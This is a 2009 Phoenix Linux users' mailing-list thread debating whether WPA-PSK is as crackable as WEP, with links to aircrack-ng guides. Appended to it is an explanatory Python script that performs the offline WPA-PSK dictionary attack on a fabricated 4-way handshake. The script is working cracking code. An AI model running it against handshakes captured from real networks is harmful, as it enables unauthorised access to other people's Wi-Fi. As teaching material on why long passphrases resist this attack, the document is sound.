running Linux on odd devices is SOOO COOL!

Kurt Granroth kurt+plug-discuss at granroth.com
Sat Nov 14 22:21:46 MST 2009


Lisa,

I'll grant you the denial-of-service attack, but I'm still not finding 
any evidence that WPA is fundamentally flawed (much less "easier to 
crack... than WEP").

I read the aircrack article earlier to see if there was new info that I 
had missed.  I also read the article you have on obnosis.com.  Finally, 
I read the LucidInteractive article you just provided.

ALL of them say the same thing: the only valid attack on WPA-PSK is a 
dictionary or brute force attack!

Okay, yes, it's very handy that you can do the password cracking 
offline.  But see the links I listed earlier... any decently crafted 
password will be nigh IMPOSSIBLE to crack unless you have nearly 
infinite resources -- offline or no.

I realize that you likely (for sure) know more about this than I do so 
if I keep missing some fundamental flaw in PSK in all of the articles 
provided, please enlighten me!

Kurt

On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
>     * One flaw allowed an attacker to cause a denial-of-service attack,
>       if the attacker could bypass several other layers of protection.
>     * A second flaw exists in the method with which WPA initializes its
>       encryption scheme. Consequently, it's actually easier to crack WPA
>       than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> /_*But how many people actually have WPA RADIUS encryption?*_/
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using aircrack-ng tools in Backtrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
> <kurt+plug-discuss at granroth.com> wrote:
>
>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>      > The whole concept of "wireless encryption security" is somewhat moot
>      > with airodump-ng etc tools.
>      >
>      > WEP keys are really easy to break.
>      >
>      > WPA is also easily encroached - but harder with a truly unique secure
>      > key (which few people use)
>      >
>      > It just exists as part of the big "security" matrix to keep the honest
>      > people out.  Crackers can get right in anyway!
>      >
>      > http://www.obnosis.com/Layer8Wireless.html
>
>     Okay, I have to take exception to how this is written.  You are
>     comparing the security of WEP and WPA as if they are somehow equivalent
>     or equally "easy" to crack.  That is just not true.
>
>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>     most cases.  Its use is more of a "please don't use this network" flag
>     than any real attempt to keep people out.
>
>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>     crackable at all (PSK) and even then, the attack is a brute force
>     dictionary attack.  By that argument, ALL password based encryption is
>     crackable.
>
>     Yes, you could successfully argue that since MOST home APs use PSK and
>     MOST probably just set the password to 'admin' or 'linksys' or some
>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>     of WPA.
>
>     But saying that "[c]rackers can get right in anyway" just isn't true.
>     All that is needed is a reasonably difficult password.  Don't use a
>     dictionary word and make it decently long and it quickly becomes far too
>     difficult to crack to make it worth it for all but the most extreme
>     cases.  It's either VERY expensive or takes YEARS.
>
>     I'm sure that you read this:
>
>     http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
>     It answers the question: "how much does it cost to crack a password?"
>     It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
>     character password using the full ASCII set would cost over $8 TRILLION
>     dollars to crack.  Even much smaller passwords are still in the
>     millions.
>
>     The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
>     the ASCII range.  Far from allowing crackers to "get right in", it's
>     nearly impossible for them to do so.
>     ---------------------------------------------------
>     PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>     To subscribe, unsubscribe, or to change your mail settings:
>     http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
>
> --
> Skype: (623)239-3392
> AT&T: (503)754-4452
> www.it-clowns.com <http://www.it-clowns.com>
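The offline WPA-PSK attack the two posters are arguing about, as an added example that is not part of this thread or of aircrack-ng: the pairwise master key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), the pairwise transient key is derived from it plus the public values in the 4-way handshake (both MACs, both nonces), and the first 16 bytes of the PTK authenticate the EAPOL frame with a MIC. An attacker who captured that handshake can therefore test candidate passphrases without the AP. The "captured" handshake below is constructed from a known passphrase with made-up MACs and nonces; the frame layout follows 802.11i but omits key data. The wordlist and passphrases are sample data.

```python
import hashlib
import hmac
import struct

# EAPOL-Key frame layout (802.11i): the 16-byte Key MIC field starts at byte 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 of the passphrase
    salted with the SSID, 4096 iterations, 32 bytes. Those 4096 iterations are
    the only thing slowing an offline guess; nothing else about WPA-PSK is secret."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label||0x00||data||i), truncate to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key from the PMK plus the public 4-way-handshake values."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (HMAC-SHA1-128), computed with the MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_key_frame(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal message 2 of the 4-way handshake (constructed; key data omitted)."""
    body = (b"\x02"                      # descriptor type: RSN
            + struct.pack(">H", 0x010a)  # key info: pairwise, MIC present, version 2
            + struct.pack(">H", 16)      # key length (CCMP)
            + struct.pack(">Q", 1)       # replay counter
            + snonce                     # key nonce (32 bytes)
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID (reserved)
            + mic                        # key MIC (16 bytes)
            + struct.pack(">H", 0))      # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def make_handshake(passphrase: str, ssid: str) -> dict:
    """Fabricate what a sniffer would capture: SSID, both MACs, both nonces and the
    MIC-bearing EAPOL frame. Constructed sample data, not a real capture."""
    ap_mac = bytes.fromhex("001a2b3c4d5e")
    sta_mac = bytes.fromhex("002233445566")
    anonce = bytes(range(32))
    snonce = bytes(range(100, 132))
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], build_eapol_key_frame(snonce))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": build_eapol_key_frame(snonce, mic), "mic": mic}


def crack_psk(hs: dict, wordlist):
    """The offline attack: per candidate, derive PMK -> PTK -> KCK and compare the MIC.
    Returns the matching passphrase, or None if the wordlist is exhausted."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


# Sample wordlist (WPA passphrases must be 8..63 characters).
WORDLIST = ["letmein!", "admin123", "password", "welcome1"]

if __name__ == "__main__":
    weak = make_handshake("password", "linksys")
    strong = make_handshake("kV9#pL2@wQ7$eR4&tY6^uI8", "linksys")
    print("weak PSK recovered:", crack_psk(weak, WORDLIST))      # password
    print("strong PSK recovered:", crack_psk(strong, WORDLIST))  # None
```

Note what is and is not in the attacker's favour here: every input except the passphrase is sent in the clear, so once the handshake is captured the AP is no longer needed, which is the "offline" point Lisa makes; but each guess costs 4096 HMAC-SHA1 iterations and there is no shortcut that depends on the protocol, which is Kurt's point that a long, non-dictionary passphrase is out of reach. The `pmk_from_passphrase("password", "IEEE")` value can be checked against the 802.11i Annex test vector.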
